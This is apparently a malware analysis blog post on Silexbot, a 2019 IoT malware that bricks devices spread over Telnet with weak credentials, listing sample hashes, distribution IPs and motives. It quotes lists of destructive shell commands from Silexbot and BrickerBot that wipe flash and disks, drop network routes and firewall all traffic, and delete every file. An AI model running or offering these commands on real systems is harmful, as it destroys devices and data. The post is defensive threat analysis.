Silexbot bricks IoT devices - A detailed look at its distribution

Botnets targeting Internet-of-Things devices have diversified over the last few years. In 2016, the prevalent Mirai IoT botnet has shown that impactful Distributed Denial-of-Service attacks can be conducted even from a bot population purely of low-resourced devices. In 2018, VPNFilter has proven that likely state-sponsored actors also leverage IoT devices. In April 2017, a malware referred to in the community as BrickerBot was discovered. This family attempts to destroy IoT devices by overwriting flash memory, and rendering the device inaccessible over the network.

In June 2019, another destructive malware enters the stage. Referred to as Silexbot, infected IoT devices will be rendered unusable through commands similar to those observed with BrickerBot. In contrast to BrickerBot that basically consisted of shell commands, Silex arrives as a statically-linked ELF executable for the following architectures running a Linux operating system: arm/arm7, m68k, mips (big and little endian), powerpc, sh4, sparc, and x86. This is a common set of architectures also covered by the many Mirai variants still spreading. Sample artifacts such as the compiler version string GCC: (GNU) 4.1.2 in the ELF .comment section indicate they were generated by the same uClibc-cross-compiler toolchain.

Distribution and Infrastructure

Silexbot was observed to spread via Telnet using default/weak credentials. Although infection attempts are still ongoing at the time of writing (2019-06-26), malicious executables have only been observed between late 2019-06-23 and 2019-06-25 (UTC+2). The following table shows the timespan that Silexbot samples have been observed on a per-architecture and per-sample basis. The rightmost columns show the IP address that served the malware binary during that time period, and an assigned variant label.

       Silexbot sample md5        | arch |     first seen   |      last seen   |   served by    | label
----------------------------------+------+------------------+------------------+----------------+------
 72d9340be745404294b92dd410dc8bd3 | arm  | 2019-06-23 22:00 | 2019-06-24 00:00 | 185.244.25.231 | v0
 736c9cdc7e87a1f7cd8ec69a4cbc83fe | arm  | 2019-06-24 22:00 | 2019-06-25 02:00 | 185.162.235.56 | v1
 1a4124006316b1565da1e9ce00473bea | arm  | 2019-06-25 14:00 | 2019-06-25 15:00 | 185.162.235.56 | v2
 323ab55ed1bd05b72d05dfe44c760a5a | arm  | 2019-06-25 15:00 | 2019-06-25 16:00 | 185.162.235.56 | v3
 e6d97354f46f20ed8b956f80eee3a042 | arm  | 2019-06-25 18:00 | 2019-06-25 19:00 | 185.162.235.56 | v4
 7dd89f4ffe3133ad82e5a09b77616b22 | arm7 | 2019-06-23 22:00 | 2019-06-24 00:00 | 185.244.25.231 | v0
 a930a1c6b48b370df00990c33f0d7f87 | arm7 | 2019-06-24 22:00 | 2019-06-25 02:00 | 185.162.235.56
 fb40babb00efefc3227ada5fa83f2f26 | arm7 | 2019-06-25 14:00 | 2019-06-25 15:00 | 185.162.235.56
 41363f6b9c224876cced0a9bcc247255 | arm7 | 2019-06-25 15:00 | 2019-06-25 16:00 | 185.162.235.56
 4b9d9c8b7fd38f14b297aef38baf8739 | arm7 | 2019-06-25 18:00 | 2019-06-25 19:00 | 185.162.235.56
 f95b8a7bac799652621f088e60edc7d6 | m68k | 2019-06-23 22:00 | 2019-06-23 23:00 | 185.244.25.231 | v0
 c7b9059b8b3ae6af3afbacef204ade32 | m68k | 2019-06-24 22:00 | 2019-06-25 02:00 | 185.162.235.56
 c9cd40dfd1826669722b4ac40acea5a9 | m68k | 2019-06-25 14:00 | 2019-06-25 15:00 | 185.162.235.56
 733f4ee17a26d15739d6cefd7ee5dedc | m68k | 2019-06-25 15:00 | 2019-06-25 17:00 | 185.162.235.56
 76a4a4c50f04141bce3f9ee51d6bc7dc | m68k | 2019-06-25 18:00 | 2019-06-25 19:00 | 185.162.235.56
 b8f2fc2be390c9a0a7b942e13688454f | mips | 2019-06-23 22:00 | 2019-06-24 00:00 | 185.244.25.231 | v0
 ce24a1499b9ce8b00c24d7bb603179fd | mips | 2019-06-24 22:00 | 2019-06-25 02:00 | 185.162.235.56
 e97e5f93a8262f391a72f2aecf0f9760 | mips | 2019-06-25 14:00 | 2019-06-25 14:00 | 185.162.235.56
 a2a80cc64adcc10101917432bcf5ed67 | mips | 2019-06-25 15:00 | 2019-06-25 17:00 | 185.162.235.56
 f38b369abaa5aba57b6fc09e38e5abc7 | mips | 2019-06-25 18:00 | 2019-06-25 19:00 | 185.162.235.56
 cfc2e2b9887df1d38ba8afe4b963677d | mpsl | 2019-06-23 22:00 | 2019-06-24 00:00 | 185.244.25.231 | v0
 c35ebfa318c2211e58d0292de6261d01 | mpsl | 2019-06-24 22:00 | 2019-06-25 02:00 | 185.162.235.56
 ffe88be8522c313be414b1d258febf12 | mpsl | 2019-06-25 14:00 | 2019-06-25 14:00 | 185.162.235.56
 f7a6a6da8d0a98d091635c5ab8eaebca | mpsl | 2019-06-25 14:00 | 2019-06-25 14:00 | 185.162.235.56
 454fac80cd2d9d03a44657226179d5f3 | mpsl | 2019-06-25 15:00 | 2019-06-25 17:00 | 185.162.235.56
 0fb4025d1dc5f9cb5be86b5a54533d71 | mpsl | 2019-06-25 17:00 | 2019-06-25 19:00 | 185.162.235.56
 e9471ab9d77fa014b6548ab164ac724c | ppc  | 2019-06-23 23:00 | 2019-06-24 00:00 | 185.244.25.231 | v0
 6c806168d0a9c1fa955180499e9a46d5 | ppc  | 2019-06-24 22:00 | 2019-06-25 02:00 | 185.162.235.56
 3613c9b68ebba4a0fde586e4aaa06301 | ppc  | 2019-06-25 15:00 | 2019-06-25 17:00 | 185.162.235.56
 e943ed85300391e894eb6aa32f9f062a | ppc  | 2019-06-25 18:00 | 2019-06-25 19:00 | 185.162.235.56
 c6877c662714e670052053d6d9eb19ee | sh4  | 2019-06-23 22:00 | 2019-06-24 00:00 | 185.244.25.231 | v0
 18c14057f60cf5dc1130b51519fbd974 | sh4  | 2019-06-24 22:00 | 2019-06-25 02:00 | 185.162.235.56
 c3a1c4dab8aedb5defd8bf76dbef8a01 | sh4  | 2019-06-25 14:00 | 2019-06-25 14:00 | 185.162.235.56
 ffcaaa0220b116c05bd099339219cd84 | sh4  | 2019-06-25 15:00 | 2019-06-25 16:00 | 185.162.235.56
 52214b9ae6dd4b2247932ad09e3137c6 | sh4  | 2019-06-25 18:00 | 2019-06-25 19:00 | 185.162.235.56
 dd2af7595ac5db6a735c424505281d75 | spc  | 2019-06-23 21:00 | 2019-06-24 00:00 | 185.244.25.231 | v0
 1038631853c4de14fd85b2f1377637f6 | spc  | 2019-06-24 22:00 | 2019-06-25 00:00 | 185.162.235.56
 9d42644498c5aee923d94f55ce535b34 | spc  | 2019-06-25 14:00 | 2019-06-25 15:00 | 185.162.235.56
 00ac36ac0db402abfa006e0dc89cc7cc | spc  | 2019-06-25 15:00 | 2019-06-25 17:00 | 185.162.235.56
 91f3a03ccab5146eb72d8e0630786d1e | spc  | 2019-06-25 18:00 | 2019-06-25 19:00 | 185.162.235.56
 3bcb6607bc0f288197171ab9664afde2 | x86  | 2019-06-23 23:00 | 2019-06-24 00:00 | 185.244.25.231 | v0
 89e86536697a87f8832565bf66523c2f | x86  | 2019-06-24 22:00 | 2019-06-25 00:00 | 185.162.235.56 | v1
 d312d1207ad1f133e2d5bf4fe669169d | x86  | 2019-06-25 14:00 | 2019-06-25 14:00 | 185.162.235.56 | v2
 4fd1517e29fb461d06899f25f2837a60 | x86  | 2019-06-25 15:00 | 2019-06-25 17:00 | 185.162.235.56 | v3
 fa48b89cef903f82f638cc087ba87133 | x86  | 2019-06-25 17:00 | 2019-06-25 20:00 | 185.162.235.56 | v4

For example, the last five lines in the table above show that five malware samples targeting x86 were observed. Initial infections on 2019-06-23 (labeled v0 in the table above) retrieved the Silexbot malware from 185.244.25.231 whereas later ones retrieved it from 185.162.235.56. In addition, the samples slightly changed over time. The earlier versions, e.g. for the x86 architecture samples with MD5 hashes 3bcb6607bc0f288197171ab9664afde2 and 89e86536697a87f8832565bf66523c2f attempt to download a shell script which performs the destruction. Later versions, e.g. d312d1207ad1f133e2d5bf4fe669169d, also include destructive commands in the executable and do not solely depend on the shell script download for the destruction to succeed. The author thus modified the malware during the two-day time period, likely to trigger the destructive functionality in a more reliable way.

The Telnet infections originate from two IP addresses: 185.244.25.231 and 185.244.25.200. The earliest Silexbot infection that led to a malware sample was observed from IP address 185.244.25.231 which also served the malware binary. Later infections originate from IP address 185.244.25.200, and used a different host to serve the malware (185.162.235.56). It is commonly observed with IoT malware that the host that triggers the infection is not necessarily the same host that serves the malware. The following table summarizes the observed IP addresses:

IP address Use(s) Variant ASN
185.244.25.231 infect, serve malware, C2 v0 KV Solutions B.V.
185.244.25.200 infect v1-4 KV Solutions B.V.
185.162.235.56 serve malware, C2 v1-4 Novin VPS

According to BGPView the network 185.244.25.0/24 belongs to KV Solutions B.V. in the Netherlands while the network 185.162.235.0/24 is associated with Iran-based hosting reseller Novin VPS.

Destructive Functionality

The destructive functionality resembles that of BrickerBot. The following commands are a few examples of BrickerBot:

# overwrite flash memory with random data
cat /dev/urandom | mtd_write mtd0 - 0 32768 
cat /dev/urandom >/dev/mtdblock0
cat /dev/urandom >/dev/mmcblk0
cat /dev/urandom >/dev/root
cat /dev/urandom >/dev/mtd0
flash_erase /dev/mtdblock0 0 999999 0
flash_erase /dev/mtdblock1 0 999999 0

# make the device inaccessible over the network
route del default
iproute del default; ip route del default
iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP

# wipe files
rm -rf /* 2>/dev/null
halt -n -f
reboot

Silexbot uses the following commands, among others:

# overwrite flash memory with random data
busybox cat /dev/urandom >/dev/mtdblock0
busybox cat /dev/urandom >/dev/sda
busybox cat /dev/urandom >/dev/ram0
busybox cat /dev/urandom >/dev/mmc0
busybox cat /dev/urandom >/dev/mtdblock10
fdisk -C 1 -H 1 -S 1 /dev/mtd0
fdisk -C 1 -H 1 -S 1 /dev/mtd1
fdisk -C 1 -H 1 -S 1 /dev/sda
fdisk -C 1 -H 1 -S 1 /dev/mtdblock0

# make the device inaccessible over the network
route del default
iproute del default
ip route del default
sysctl -w net.ipv4.tcp_timestamps=0
sysctl -w kernel-threads-max=1
iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP

# wipe files
rm -rf /* 2</dev/null
halt -n -f
reboot

The most recent executable (e.g. fa48b89cef903f82f638cc087ba87133) contains commands which are most likely copied from BrickerBot:

cat /dev/urandom | mtd_write mtd1 - 0 32768\n
' ii11II += 'busybox cat /dev/urandom >/dev/mtd0 &\n
busybox cat /dev/urandom >/dev/sda &\n

The substring ii11II += likely stems from an obfuscated BrickerBot Python script named mod_plaintext.py, indicating that the Silexbot author may have been influenced by the BrickerBot code. However, given that the BrickerBot source code is publicly available, this does not suggest authorship overlap.

Command and Control (C2)

The Silexbot malware exhibits a minimal, feedback-only command and control capability. Possibly to measure infection population, the malware sends the string "illed bot process\n" to the C2 server.

Conclusion

The Silexbot malware clearly has a destructive purpose. However, the actor’s motivation is not entirely clear. When executed, the malware emits the message [silexbot] i am only here to prevent skids to flex their skidded botnet I am sorry for your device but it has to be done because all these skids claiming and thinkking they are some god coder + people selling spots on botnets I am getting sick of it so yeah sorry, which suggests the actor aims at preventing infection by other malware. A similar motive appeared in the BrickerBot context.

On the other hand, the term SILEX may refer to the Separation of Isotopes by Laser Excitation, a method for Uranium enrichment. Given the rising tensions in the Middle East, and the Iranian nexus of one of the hosting providers, some speculate Silexbot could be retaliatory. However, an interview with the alleged author behind Silexbot suggests a 14-year-old European with no retaliatory motivation may have conducted the attack.

Learn more

We are looking for skilled computer science students who would like to learn more about malware analysis and reverse engineering. Want more information about our masters programme on internet security? Apply now online at https://www.it-sicherheit.de/master-studieren/ (in German).

Christian J. Dietrich
Christian J. Dietrich
Professor of Computer Security